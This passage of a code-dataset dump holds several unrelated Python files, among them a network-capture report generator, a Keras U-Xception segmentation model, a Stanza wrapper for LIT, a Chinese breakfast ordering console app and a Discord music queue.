'Hogs')\n\n plt.pie(sizes, explode=explode, labels=labels, colors=colors,\n autopct='%1.1f%%', shadow=True, startangle=90)\n # Set aspect ratio to be equal so that pie is drawn as a circle.\n plt.axis('equal')\n\n plt.savefig(\"Parser/Parsed/pie.png\")\n def buildTable(self):\n with open(\"stats.csv\") as f:\n content = f.readlines()\n\n content = content[2:]\n table = \"\"\"\n \n \n \"\"\"\n for i in range(0, len(content), 4):\n\n ctrl = sum([ int(x) for x in content[i+2].split(',')])\n data = sum([ int(x) for x in content[i+3].split(',')])\n mgt = [ x for x in content[i+1].split(',')]\n del mgt[6]\n del mgt[6]\n ctrl = str(ctrl)\n data = str(data)\n table += \"\"\"\n
Noeud 1 Noeud 2 Données controle 0 1 23 4 5 6 7 89 10
\n \n\n\n\n\n
\"\"\"+content[i].split(',')[1]+\"\"\" \"\"\"+content[i].split(',')[2]+\"\"\" \"\"\"+data+\"\"\" \"\"\"+ctrl+\"\"\" \"\"\"+mgt[0]+\"\"\"\"\"\"+mgt[1]+\"\"\"\"\"\"+mgt[2]+\"\"\"\"\"\"+mgt[3]+\"\"\"\"\"\"+mgt[4]+\"\"\"\"\"\"+mgt[5]+\"\"\"\"\"\"+mgt[6]+\"\"\"\"\"\"+mgt[7]+\"\"\"\"\"\"+mgt[8]+\"\"\"\"\"\"+mgt[9]+\"\"\"\"\"\"+mgt[10]+\"\"\"
\n\n \"\"\"\n return table\n\n\"\"\"\n def networkMap(self):\n g = Graph()\n g.add_verte(name=self.preview.BSSID)\n for node in self.nodes:\n g.add_verte(name=node[0])\n g.add_edge(self.preview.BSSID , node[0])\n\"\"\"\n\n\n# Main program\nif __name__==\"__main__\":\n preview = Preview(\"capture.cap\", \"100 Mo\", \"15.06.15 17h35\", \"15.06.15 17h59\", \"Abderrahmane\", \"01:02:03:04:05:06\", 65004,\n 6, -56, 4, 1800, 65000)\n report = Report(\"Abderrahmane Boulgheraif\", \"10.10.15 15h30\", \"Spoofing\", preview)\n\n","sub_path":"Utilz/DataTypes.py","file_name":"DataTypes.py","file_ext":"py","file_size_in_byte":11440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"182079708","text":"import argparse\nimport asyncio\n\nclass RoomNotificationArgumentParser(argparse.ArgumentParser):\n\n def __init__(self, app, command, client, **kwargs):\n if 'prog' not in kwargs:\n kwargs['prog'] = command\n super().__init__(**kwargs)\n self.client = client\n self.command = command\n self.app = app\n self.task = None\n\n def error(self, message):\n task = asyncio.Task(self.client.room_client.send_notification(html=message))\n raise ArgumentParserError(task)\n\n def print_help(self, file=None):\n message = self.format_help()\n self.task = asyncio.Task(self.client.room_client.send_notification(html=\"
\" + message + \"
\"))\n\n def send_usage(self):\n message = self.format_usage()\n self.task = asyncio.Task(self.client.room_client.send_notification(text=message))\n return self.task\n\n def exit(self, status=0, message=None):\n raise ArgumentParserError(self.task)\n\n @asyncio.coroutine\n def handle_webhook(self, body):\n txt = body['item'][\"message\"][\"message\"][len(self.command):]\n from_mention = body['item']['message']['from']['mention_name']\n items = [x for x in txt.split(\" \") if x]\n # noinspection PyBroadException\n try:\n args = self.parse_args(items)\n except ArgumentParserError as e:\n if e.task:\n yield from e.task\n return\n\n try:\n msg = yield from args.func(args)\n if msg:\n if isinstance(msg, HtmlNotification):\n yield from self.client.room_client.send_notification(from_mention=from_mention,\n html=msg.__str__())\n else:\n yield from self.client.room_client.send_notification(from_mention=from_mention, text=msg)\n except AttributeError:\n if self.task:\n yield from self.task\n elif not args.__dict__:\n yield from self.send_usage()\n else:\n raise\n\n def add_subparsers(self, **parent_kwargs):\n\n parent = self\n\n class MySubParser(RoomNotificationArgumentParser):\n def __init__(self, **kwargs):\n handler = kwargs.pop('handler')\n super().__init__(parent.app, parent.command, parent.client, **kwargs)\n self.set_defaults(func=handler)\n\n return super().add_subparsers(parser_class=MySubParser, **parent_kwargs)\n\n\nclass HtmlNotification(object):\n def __init__(self, text):\n super().__init__()\n self.text = text\n\n def __str__(self):\n return self.text\n\n\nclass ArgumentParserError(Exception):\n\n def __init__(self, task):\n self.task = task","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"505343649","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport json, os, cv2, sys\n\n\ndef vis_detections(im_path, bbx_objs, thresh=0.5):\n \"\"\"Draw detected bounding boxes.\"\"\"\n im = cv2.imread(im_path)\n im = im[:, :, (2, 1, 0)]\n fig, ax = plt.subplots(figsize=(12, 12))\n ax.imshow(im, aspect='equal')\n for bbx_obj in bbx_objs:\n \n score = bbx_obj['score'] \n if score < thresh:\n continue\n bbox = bbx_obj['bbox']\n cls = bbx_obj['class']\n\n ax.add_patch(\n plt.Rectangle((bbox[0], bbox[1]),\n bbox[2] - bbox[0],\n bbox[3] - bbox[1], fill=False,\n edgecolor='red', linewidth=3.5)\n )\n ax.text(bbox[0], bbox[1] - 2,\n '{:s} {:.3f}'.format(cls, score),\n bbox=dict(facecolor='blue', alpha=0.5),\n fontsize=14, color='white')\n\n plt.axis('off')\n plt.tight_layout()\n plt.draw()\n plt.show()\n\ndef load_video_rcnn_bbx(rcnn_bbx_folder, video_name):\n\n file_pref = os.path.join(rcnn_bbx_folder, video_name) \n\n # load rcnn bbx\n with open(file_pref + '_rcnnbbx.json') as json_file:\n rcnn_bbx_data = json.load(json_file)\n\n rcnn_bbx_data = sorted(rcnn_bbx_data['imgblobs'], key=lambda x: int(x['img_path'].split('/')[-1].split('.')[0]))\n\n return rcnn_bbx_data\n\nif __name__ == \"__main__\":\n\n video_name = sys.argv[1]\n start_fid = int(sys.argv[2])\n #rcnn_data = load_video_rcnn_bbx('/mnt/tags/rcnn-bbx-tmp', 'dog_fight_pit_bull_owner_sues_family_for_1m_dollars_after_her_dogs_killed_their_beagle_sYJf_m0qDiw')\n #rcnn_data = load_video_rcnn_bbx('/mnt/tags/rcnn-bbx-tmp', 'dog_fight_pit_bull_owner_sues_family_for_1m_dollars_after_her_dogs_killed_their_beagle_sYJf_m0qDiw')\n rcnn_data = load_video_rcnn_bbx('/mnt/tags/rcnn-bbx-tmp', video_name)\n\n for fid, img_obj in enumerate(rcnn_data):\n if fid < start_fid:\n continue\n im_path = img_obj['img_path']\n vis_detections(im_path, img_obj['pred'], 0.4)\n \n \n","sub_path":"fast-rcnn/tools/vis-video.py","file_name":"vis-video.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"249907142","text":"import nxppy\nimport paho.mqtt.client as mqtt\nimport json\nimport time\n\nTOPIC = 'bike/'\nMQTT_BROKER = '10.24.23.140'\nMQTT_PORT = 1883\n\n\"\"\"\nThis component will continuously run in a own process\non the raspberry pi and publish messages when presented\nwith a NFC device\n\"\"\"\n\n# MQTT setup\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\n\ndef on_message(client, userdata, msg):\n print(msg.topic+\" \"+str(msg.payload))\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(MQTT_BROKER, MQTT_PORT)\nclient.loop_start()\n\n\n\"\"\"\nset up nxppy\nnote that installing this is more than installing it\nfollow installation guide: https://github.com/svvitale/nxppy\n\"\"\"\n\nmifare = nxppy.Mifare()\n\nwhile True:\n try:\n uid = mifare.select()\n print(uid)\n\n client.publish(\n TOPIC,\n json.dumps({\n \"command\": \"nfc_det\",\n \"value\": uid,\n \"lock_name\": \"en\",\n }).encode()\n )\n except nxppy.SelectError:\n # We want the reader to fail silently\n # when no nfc device i presented\n pass\n\n time.sleep(1)\n","sub_path":"bike-rack-master/nfc_component.py","file_name":"nfc_component.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"204917711","text":"# coding: utf-8\n\nimport json\n\nclass Address(object):\n zipcode = \"\"\n prefecture = \"\"\n city = \"\"\n\n def __init__(self, zipcode, json):\n self.zipcode = zipcode\n self.prefecture = json['pref'].encode('utf-8')\n self.city = json['address'].encode('utf-8')\n\n def __repr__(self):\n return '
' % \\\n (self.zipcode, self.prefecture, self.city)","sub_path":"geopy/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"502621198","text":"import tensorflow as tf\nfrom keras import backend as K\nfrom keras.utils import Sequence\nfrom keras.layers import LeakyReLU, MaxPooling2D, Dropout, Conv2D, Concatenate, BatchNormalization, Add, ZeroPadding2D\nfrom keras.layers.convolutional import UpSampling2D, Conv2DTranspose\nfrom keras.layers.merge import concatenate\nfrom keras.applications.xception import Xception\nfrom keras.engine.training import Model\nfrom keras.losses import binary_crossentropy\nimport numpy as np\nfrom config import *\nfrom optimizer import ad\n\n\ndef convolution_block(x, filters, size, strides=(1, 1), padding='same', activation=True):\n x = Conv2D(filters, size, strides=strides, padding=padding)(x)\n x = BatchNormalization()(x)\n if activation == True:\n x = LeakyReLU(alpha=0.1)(x)\n return x\n\n\ndef residual_block(blockInput, num_filters=16):\n x = LeakyReLU(alpha=0.1)(blockInput)\n x = BatchNormalization()(x)\n blockInput = BatchNormalization()(blockInput)\n x = convolution_block(x, num_filters, (3, 3))\n x = convolution_block(x, num_filters, (3, 3), activation=False)\n x = Add()([x, blockInput])\n return x\n\n\ndef UXception(input_shape=(None, None, 3)):\n # Use the weight of pre-train model\n backbone = Xception(input_shape=input_shape, weights='imagenet', include_top=False)\n input = backbone.input\n start_neurons = 16\n\n conv4 = backbone.layers[121].output\n conv4 = LeakyReLU(alpha=0.1)(conv4)\n pool4 = MaxPooling2D((2, 2))(conv4)\n pool4 = Dropout(0.1)(pool4)\n\n # Middle\n convm = Conv2D(start_neurons * 32, (3, 3), activation=None, padding=\"same\")(pool4)\n convm = residual_block(convm, start_neurons * 32)\n convm = residual_block(convm, start_neurons * 32)\n convm = LeakyReLU(alpha=0.1)(convm)\n\n deconv4 = Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding=\"same\")(convm)\n uconv4 = concatenate([deconv4, conv4])\n uconv4 = Dropout(0.1)(uconv4)\n\n uconv4 = Conv2D(start_neurons * 16, (3, 3), activation=None, padding=\"same\")(uconv4)\n uconv4 = residual_block(uconv4, start_neurons * 16)\n uconv4 = residual_block(uconv4, start_neurons * 16)\n uconv4 = LeakyReLU(alpha=0.1)(uconv4)\n\n deconv3 = Conv2DTranspose(start_neurons * 8, (3, 3), strides=(2, 2), padding=\"same\")(uconv4)\n conv3 = backbone.layers[31].output\n uconv3 = concatenate([deconv3, conv3])\n uconv3 = Dropout(0.1)(uconv3)\n\n uconv3 = Conv2D(start_neurons * 8, (3, 3), activation=None, padding=\"same\")(uconv3)\n uconv3 = residual_block(uconv3, start_neurons * 8)\n uconv3 = residual_block(uconv3, start_neurons * 8)\n uconv3 = LeakyReLU(alpha=0.1)(uconv3)\n\n deconv2 = Conv2DTranspose(start_neurons * 4, (3, 3), strides=(2, 2), padding=\"same\")(uconv3)\n conv2 = backbone.layers[21].output\n conv2 = ZeroPadding2D(((1, 0), (1, 0)))(conv2)\n uconv2 = concatenate([deconv2, conv2])\n\n uconv2 = Dropout(0.1)(uconv2)\n uconv2 = Conv2D(start_neurons * 4, (3, 3), activation=None, padding=\"same\")(uconv2)\n uconv2 = residual_block(uconv2, start_neurons * 4)\n uconv2 = residual_block(uconv2, start_neurons * 4)\n uconv2 = LeakyReLU(alpha=0.1)(uconv2)\n\n deconv1 = Conv2DTranspose(start_neurons * 2, (3, 3), strides=(2, 2), padding=\"same\")(uconv2)\n conv1 = backbone.layers[11].output\n conv1 = ZeroPadding2D(((3, 0), (3, 0)))(conv1)\n uconv1 = concatenate([deconv1, conv1])\n\n uconv1 = Dropout(0.1)(uconv1)\n uconv1 = Conv2D(start_neurons * 2, (3, 3), activation=None, padding=\"same\")(uconv1)\n uconv1 = residual_block(uconv1, start_neurons * 2)\n uconv1 = residual_block(uconv1, start_neurons * 2)\n uconv1 = LeakyReLU(alpha=0.1)(uconv1)\n\n uconv0 = Conv2DTranspose(start_neurons * 1, (3, 3), strides=(2, 2), padding=\"same\")(uconv1)\n uconv0 = Dropout(0.1)(uconv0)\n uconv0 = Conv2D(start_neurons * 1, (3, 3), activation=None, padding=\"same\")(uconv0)\n uconv0 = residual_block(uconv0, start_neurons * 1)\n uconv0 = residual_block(uconv0, start_neurons * 1)\n uconv0 = LeakyReLU(alpha=0.1)(uconv0)\n\n uconv0 = Dropout(0.1 / 2)(uconv0)\n output_layer = Conv2D(1, (1, 1), padding=\"same\", activation=\"sigmoid\")(uconv0)\n\n model = Model(input, output_layer)\n model.name = 'u-xception'\n\n return model\n\n\ndef get_iou_vector(A, B):\n # Numpy version\n batch_size = A.shape[0]\n metric = 0.0\n for batch in range(batch_size):\n t, p = A[batch], B[batch]\n true = np.sum(t)\n pred = np.sum(p)\n\n # deal with empty mask first\n if true == 0:\n metric += (pred == 0)\n continue\n\n # non empty mask case. Union is never empty\n # hence it is safe to divide by its number of pixels\n intersection = np.sum(t * p)\n union = true + pred - intersection\n iou = intersection / union\n\n # iou metrric is a stepwise approximation of the real iou over 0.5\n iou = np.floor(max(0, (iou - 0.45) * 20)) / 10\n\n metric += iou\n\n # teake the average over all images in batch\n metric /= batch_size\n return metric\n\n\ndef my_iou_metric(label, pred):\n # Tensorflow version\n return tf.py_func(get_iou_vector, [label, pred > 0.5], tf.float64)\n\n\n# the F1 score of image segmentation\ndef dice_coef(y_true, y_pred):\n y_true_f = K.flatten(y_true)\n y_pred = K.cast(y_pred, 'float32')\n y_pred_f = K.cast(K.greater(K.flatten(y_pred), 0.5), 'float32')\n intersection = y_true_f * y_pred_f\n score = 2. * K.sum(intersection) / (K.sum(y_true_f) + K.sum(y_pred_f))\n return score\n\n\n# inverse form of dice coef\ndef dice_loss(y_true, y_pred):\n smooth = 1.\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = y_true_f * y_pred_f\n score = (2. * K.sum(intersection) + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n return 1. - score\n\n\ndef bce_dice_loss(y_true, y_pred):\n return binary_crossentropy(y_true, y_pred) + dice_loss(y_true, y_pred)\n\n\ndef bce_logdice_loss(y_true, y_pred):\n return binary_crossentropy(y_true, y_pred) - K.log(1. - dice_loss(y_true, y_pred))\n\n\ndef model_gen():\n model = UXception(input_shape=(img_size, img_size, 3))\n model.summary()\n model.compile(loss=bce_dice_loss, optimizer=ad, metrics=[my_iou_metric])\n return model\n\n","sub_path":"model_uxecption.py","file_name":"model_uxecption.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"51509469","text":"import random\nlis=[]#存放所点菜品的列表\nlis1=[]#办卡用存储账户和密码所用列表\nlis_addcai=[]#卖家添加菜单\ndef system():#人性化显示主菜单\n print('*'*30)\n print('欢迎使用街边早餐管理系统 --- 1388888888')\n print('店内优惠活动:现在办理会员卡可享受全店商品5折优惠!',end='\\n\\t')\n print('1.买家服务',end='\\n\\t')#查看销售菜品 选择菜品 查看已点菜单 删除所选菜品 返回上级菜单\n print('2.付款结帐',end='\\n\\t') #现金付款 会员卡付款 返回上级菜单\n print('3.会员服务',end='\\n\\t') #办卡 会员卡充值 返回上级菜单\n print('4.卖家服务',end='\\n\\t') #添加菜品\n print('0.退出系统')\n print('*'*30)\n\n\ndef cai():#卖家添菜函数\n i=1\n maiJia=int(input('输入卖家密码'))#防止买家篡改密码设置固定密码\n n=int(input('输入添加菜的个数'))#循环次数 卖家根据添加菜数设置循环次数,在循环中可以循环输入菜名\n while(i<=n):\n if maiJia==123:\n caiMingI=input('卖家请添加菜名 \\t')\n priceI=int(input('卖家请添加价钱 \\t'))\n dic_addcai={'caiMing':caiMingI,'price':priceI}#将输入的value 菜名以及价格 存到字典\n lis_addcai.append(dic_addcai)#将字典存到列表\n i+=1\n\ndef dianCai():#买家服务函数\n dic={}#定义一个空字典\n print('*'*30)\n print('1.查看销售菜品')\n print('2.选择菜品')\n print('3.查看已点菜单')\n print('4.删除所选菜品')\n print('5.返回上级菜单')\n print('*'*30)\n while(True):\n zjL=int(input('根据提示选择点菜子菜单'))\n if(zjL==1):#如果中间变量=1,显示如下菜单\n print('所点菜名如下 : ')\n for a in lis_addcai: #遍历列表查找相应的菜单\n print('菜名 :%s '% a['caiMing'])#显示菜名\n print('价格 :%d '% a['price'])\n print('已显示所有菜单')\n\n\n\n elif(zjL==2):#如果中间变量=2,显示选择菜品菜单\n while(True):#循环选择\n print('*'*30)\n dianCai=input('菜名')\n for dic_addcai in lis_addcai:\n if dic_addcai['caiMing']==dianCai:\n print('已点菜:%s' % dic_addcai['caiMing'] )\n lis.append(dic_addcai)\n panD=input('是否选好菜 输入 Y/N\\t')#判断是否选好菜,选好即可跳出循环,未选择好继续循环\n if (panD=='Y'):\n break\n print('*'*30)\n elif(zjL==3):\n displayAll()#功能 显示所点菜品\n elif(zjL==4):\n delete()#功能 删除所点菜品\n elif(zjL==5):\n print('返回上级菜单')\n break\n\n\ndef displayAll():#显示菜品函数\n print('*'*30)\n print('所点菜名如下 : ')\n for a in lis: #遍历列表查找相应的菜单\n print('菜名 :%s '% a['caiMing']) #输出菜名\n print('已显示所有菜单')\n print('*'*30)\n\ndef delete():#删除菜品函数\n print('*'*30)\n dCi=input('输入菜名字 \\t')\n print('请删除 %s 菜名' % dCi)\n for dic in lis:#在列表中循环遍历查找dic(所查键值为输入的键值 根据键值查找对应的字典)\n #print(lis)\n if dic['caiMing'] == dCi: #判等的输入菜单名字是否在字典中\n lis.remove(dic)#如果在,则删除此字典\n print('删除 %s 成功' % dCi)\n print('*'*30)\n\n\ndef fuKuanZ():#付款函数 调用 现金付款函数和刷卡付款函数\n print('*'*30)\n print('1.现金付款')\n print('2.刷卡付款')\n print('3.退出菜单')\n zjL=int(input('根据提示选择相应的付款方式'))\n if(zjL==1):\n fuKuan()\n elif(zjL==2):\n shuCard()\n elif(zjL==3):\n system()\n print('*'*30)\n\nmony=0\ndef fuKuan():#定义现金���款函数\n for dic in lis:\n\n print('菜名 : %s 价格 : %d '%(dic['caiMing'],dic['price']))\n mony=int(input('price'))\n if mony>dic['price']: #判断如果输入的钱大于菜的单价即找零\n global mony #引用全局变量\n zl=mony-dic['price'] #计算找零 给的价钱-商品价格\n print('找零 %d 元' %zl)\n else:#(dir['caiMing']=='gbr'):\n print('付款成功')\n\nmoney=0\nmoney1=0\nmoney2=0\ndef shuCard():#定义刷卡函数\n global money\n if money<=0:#判断账户中的钱是否有余额\n money=int(input('充值款'))#输入充值金额\n name=input('输入会员帐号')\n pas=int(input('输入会员密码'))\n for dic1 in lis1:#在存储密码 和 账户的列表中遍历字典\n if (dic1['name']==name) and (dic1['pas']==pas):#如果字典中name键值和pas键值对应的值等于输入的内容\n for dic in lis:#在菜单列表中遍历字典\n if(money0 and len(lis1)!=0:#如果有余额,就直接冲入相应的充值金额\n jeIn=int(input('请冲入金额'))\n money=money+jeIn\n print('卡内余额 %d' %money)\n\n print('*'*30)\n\nwhile(True):#while的主函数\n system()\n print('*'*30)\n coo=int(input('根据提示输入相应功能编号'))\n if(coo==1):#调用买家函数\n dianCai()\n elif(coo==2):#调用付款函数\n fuKuanZ()\n elif(coo==3):#调用会员服务函数\n huiY()\n elif(coo==4):#卖家添加菜服务\n cai()\n elif(coo==0):#退出系统函数\n print('-^ ^-'*7)\n print('已退出系统,欢迎下次光临')\n print('-^ ^-'*7)\n break\n print('*'*30)\n\n\n\n\n\n\n\n","sub_path":"0518/project_0524.py","file_name":"project_0524.py","file_ext":"py","file_size_in_byte":7298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"237749257","text":"# Lint as: python3\n\"\"\"Wrapper for Stanza model\"\"\"\n\nfrom lit_nlp.api import model as lit_model\nfrom lit_nlp.api import types as lit_types\nfrom lit_nlp.api import dtypes\n\nSpanLabel = dtypes.SpanLabel\nEdgeLabel = dtypes.EdgeLabel\n\n\nclass StanzaTagger(lit_model.Model):\n def __init__(self, model, tasks):\n self.model = model\n self.sequence_tasks = tasks[\"sequence\"]\n self.span_tasks = tasks[\"span\"]\n self.edge_tasks = tasks[\"edge\"]\n\n self._input_spec = {\n \"sentence\": lit_types.TextSegment(),\n }\n\n self._output_spec = {\n \"tokens\": lit_types.Tokens(),\n }\n\n # Output spec based on specified tasks\n for task in self.sequence_tasks:\n self._output_spec[task] = lit_types.SequenceTags(align=\"tokens\")\n for task in self.span_tasks:\n self._output_spec[task] = lit_types.SpanLabels(align=\"tokens\")\n for task in self.edge_tasks:\n self._output_spec[task] = lit_types.EdgeLabels(align=\"tokens\")\n\n def _predict(self, ex):\n \"\"\"\n Predicts all specified tasks for an individual example\n\n :param ex (dict):\n This should be a dict with a single entry with:\n key = \"sentence\"\n value (str) = a single string for prediction\n\n :return (list):\n This list contains dicts for each prediction tasks with:\n key = task name\n value (list) = predictions\n \"\"\"\n doc = self.model(ex[\"sentence\"])\n prediction = {}\n for sentence in doc.sentences:\n prediction[\"tokens\"] = [word.text for word in sentence.words]\n\n # Process each sequence task\n for task in self.sequence_tasks:\n prediction[task] = [word.to_dict()[task] for word in sentence.words]\n\n # Process each span task\n for task in self.span_tasks:\n # Mention is currently the only span task\n if task == \"mention\":\n prediction[task] = []\n for entity in sentence.entities:\n # Stanza indexes start/end of entities on char. LIT needs them as token indexes\n start, end = entity_char_to_token(entity, sentence)\n span_label = SpanLabel(start=start, end=end, label=entity.type)\n prediction[task].append(span_label)\n\n # Process each edge task\n for task in self.edge_tasks:\n # Deps is currently the only edge task\n if task == \"deps\":\n prediction[task] = []\n for relation in sentence.dependencies:\n label = relation[1]\n span1 = relation[2].id\n span2 = relation[2].id if label == \"root\" else relation[0].id\n edge_label = EdgeLabel(\n (span1 - 1, span1), (span2 - 1, span2), label\n )\n prediction[task].append(edge_label)\n\n return prediction\n\n def predict_minibatch(self, inputs, config=None):\n return [self._predict(ex) for ex in inputs]\n\n def input_spec(self):\n return self._input_spec\n\n def output_spec(self):\n return self._output_spec\n\n\ndef entity_char_to_token(entity, sentence):\n \"\"\"\n Takes Stanza entity and sentence objects and returns the start and end tokens for the entity\n :param entity: Stanza entity\n :param sentence: Stanza sentence\n :return (int, int): Returns the start and end locations indexed by tokens\n \"\"\"\n start_token, end_token = None, None\n for i, v in enumerate(sentence.words):\n x = v.misc.split(\"|\")\n if \"start_char=\" + str(entity.start_char) in x:\n start_token = i\n if \"end_char=\" + str(entity.end_char) in x:\n end_token = i + 1\n return start_token, end_token\n","sub_path":"lit_nlp/examples/models/stanza_models.py","file_name":"stanza_models.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"168688312","text":"import asyncio\nimport traceback\nimport time\n\nimport romkan\nimport discord\nfrom utils.tts import MaryTTS\nfrom discord.ext import commands\n\nfrom . import music_sources as sources\nfrom . import music_converters as conv\n\n\nasync def get_entry(song, loop):\n song = sources.YTDLSource(song, loop=loop)\n await song.load_data()\n\n return song\n\n\nclass Queue:\n def __init__(self, chunk_size: int=2, max_chunks: int=None,\n max_per_user: int=None, unique: str=None,\n silence_errors=False):\n self.size = chunk_size\n self.max = max_chunks\n self.user_max = max_per_user\n self.unique = unique\n self.silence_errors = silence_errors\n self.items = []\n self.current = []\n\n def _error(self, err):\n if not self.silence_errors:\n raise Exception(err)\n\n @property\n def queue(self):\n r = self.current[:]\n for group in self.items:\n r += group\n return r\n\n def __len__(self):\n return len(self.queue)\n\n def __repr__(self):\n return (\"Queue(entries={1}, chunk_size={0.size}, \"\n \"max_chunks={0.max}, per_user={0.user_max}, \"\n \"unique={0.unique}, silent={0.silence_errors})\").format(\n self, len(self.queue))\n\n def show(self, source: str=\"title\"):\n res = []\n for group in self.items:\n g = []\n for data in group:\n g.append({source: getattr(data, source),\n \"request_id\": data.request_id})\n res.append(g)\n return res\n\n def add(self, items: list):\n errors = []\n for data in items:\n try:\n self.append(data)\n except Exception as e:\n errors[data.title] = e.args[0]\n return errors\n\n def append(self, item: sources.YTDLSource):\n # print(\"Adding:\", item)\n # === LOGIC ===\n # Basically, the first thing is to find the index of the user's\n # last song (since when they add something new, it should always be\n # added after their other songs)\n # This is achieved by iterating backwards through the current queue,\n # stopping the first time something by that user is found\n # Next, we iterate forward from that starting point.\n # For each song, we put the user that added it into a set.\n # We continue to move forward this way until we hit a user that\n # is already in the set. We stop here and insert the item.\n\n # For users A, B, and C, imagine starting queue ABCABCABCBBBBB\n\n # User A tries to put something in the queue\n # v last A, start here\n # ABCABCABCBBBBB\n # B goes into the set\n # C goes into the set\n # B is already in the set, so the A gets added here\n # ABCABCABCABBBBB\n\n # data[\"requester\"] should have the `id` attribute,\n # this could be e.g. a discord.Member\n id = item.request_id\n\n if not self.items:\n self.items.append([item])\n return\n\n if len(self.items) == self.max:\n self._error(\"Max queue chunks reached.\")\n\n if sum((chunk[0].request_id == id and\n len(chunk) == self.size)\n for chunk in self.items) == self.user_max:\n self._error(\"User reached maximum amount of chunks\")\n\n # Check for dupes\n if self.unique is not None:\n for chunk in self.items:\n for item_u in chunk:\n if (getattr(item_u, self.unique) ==\n getattr(item, self.unique)):\n self._error(\n \"Item already queued, `unique` key duplicate.\")\n\n # Insert the data\n # print(\"Iterating backwards\")\n for index, value in enumerate(reversed(self.items)):\n # print(index)\n if index == len(self.items)-1 or value[0].request_id == id:\n # we found the last item by us or\n # we have no items in the queue\n\n if value[0].request_id == id and len(value) < self.size:\n # last item by us has a free space left\n value.append(item)\n return\n\n # index to start from\n # python is 0-indexed so subtract 1\n start = len(self.items) - index - 1\n found_ids = []\n\n # Easier than `enumerate` in this case\n # print(\"Iterating forward\")\n while True:\n # print(start)\n if start >= len(self.items):\n # print(\"Inserting at the end\")\n # No place left, put it at the end\n self.items.append([item])\n return\n\n id = self.items[start][0].request_id\n\n if id in found_ids:\n # print(\"Duplicate found, inserting\")\n # this id appears for the second time now\n # so insert here\n self.items.insert(start, [item])\n return\n\n # Add the id to the list\n found_ids.append(id)\n\n start += 1\n\n def pop(self):\n if not self.current:\n # Load the next chunk\n # we use `pop` to make sure it disappears from the original list\n # because otherwise people could queue up forever\n self.current = self.items.pop(0)\n return self.current.pop(0)\n\n def clear(self):\n self.items.clear()\n self.current.clear()\n\n def shuffle(self, requester):\n s = []\n for i, chunk in enumerate(self.items):\n if chunk[0].requester == requester:\n chunk.shuffle() # shuffle chunk items\n s.append(i)\n\n # shuffle chunks around\n s_c = s[:]\n s_c.shuffle()\n queue = self.items[:]\n for i in s:\n queue[i] = self.items[s_c[i]]\n\n self.items = queue\n\n\nclass Player:\n opts = {\n 'format': 'bestaudio/best',\n 'noplaylist': True,\n 'audioformat': 'flac',\n 'quiet': True,\n 'default_search': 'auto'\n }\n\n try:\n tts = MaryTTS(enabled=True)\n except:\n # Voice not installed\n pass\n\n def __init__(self, voice_client, channel, cog):\n self.vc = voice_client\n self.chan = channel\n self._queue = Queue(unique=\"url\")\n self.cog = cog\n self.source = None\n\n async def queue(self, song, requester=None):\n if \"youtube.com/playlist\" in song:\n songs = await conv.youtube_playlist(song, requester,\n self.vc.loop)\n errors = self._queue.add(songs)\n if errors:\n await self.chan.send(\"\\n\".join(\"{}: {}\".format(t, e)\n for t, e in errors.items()))\n return await self.chan.send(\"Added {} items to the queue!\"\n .format(len(songs)-len(errors)))\n\n if all(x in song for x in [\"soundcloud.com\", \"/sets/\"]):\n songs = await conv.soundcloud_playlist(song, requester,\n self.vc.loop)\n errors = self._queue.add(songs)\n if errors:\n await self.chan.send(\"\\n\".join(\"{}: {}\".format(t, e)\n for t, e in errors.items()))\n return await self.chan.send(\"Added {} items to the queue!\"\n .format(len(songs)-len(errors)))\n\n if \"bandcamp.com/album\" in song:\n songs = await conv.bandcamp_playlist(song, requester,\n self.vc.loop)\n errors = self._queue.add(songs)\n if errors:\n await self.chan.send(\"\\n\".join(\"{}: {}\".format(t, e)\n for t, e in errors.items()))\n return await self.chan.send(\"Added {} items to the queue!\"\n .format(len(songs)-len(errors)))\n\n if \"osu.ppy.sh\" in song:\n song = await conv.osu_song(song, requester, self.vc.loop)\n self._queue.append(song)\n await self.chan.send(\n 'Added {} to the queue!'.format(song['title']))\n\n entry = await get_entry(song, self.vc.loop)\n entry.set_requester(requester)\n if entry.duration is None:\n return await self.chan.send(\"Song has no duration, not queueing!\")\n self._queue.append(entry)\n await self.chan.send('Added {} to the queue!'.format(entry.title))\n\n async def download_next(self):\n next = self._queue.pop()\n\n await self.chan.send('Now Playing: {}'.format(next.title))\n print('Now Playing: {}'.format(next.title))\n await next.load()\n\n self._start_time = time.time()\n\n self.current_song = next\n\n if self.source is not None:\n self.source = sources.OverlaySource(self.source, next,\n self, vc=self.vc)\n self.vc.source = self.source\n\n try:\n source = \"song_cache/{}.wav\".format(self.chan.id)\n can_pronounce = (\n \"abcdefghijklmnopqrstuvwxyz\"\n \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n \"0123456789 \"\n )\n replaces = {\n \"&\": \"and\",\n \" - \": \". \",\n \"ft.\": \"featuring\",\n \"official audio\": \"\",\n \"official video\": \"\",\n \"official music video\": \"\",\n \"free download\": \"\",\n \"lyric video\": \"\",\n \"audio\": \"\"\n }\n\n t = 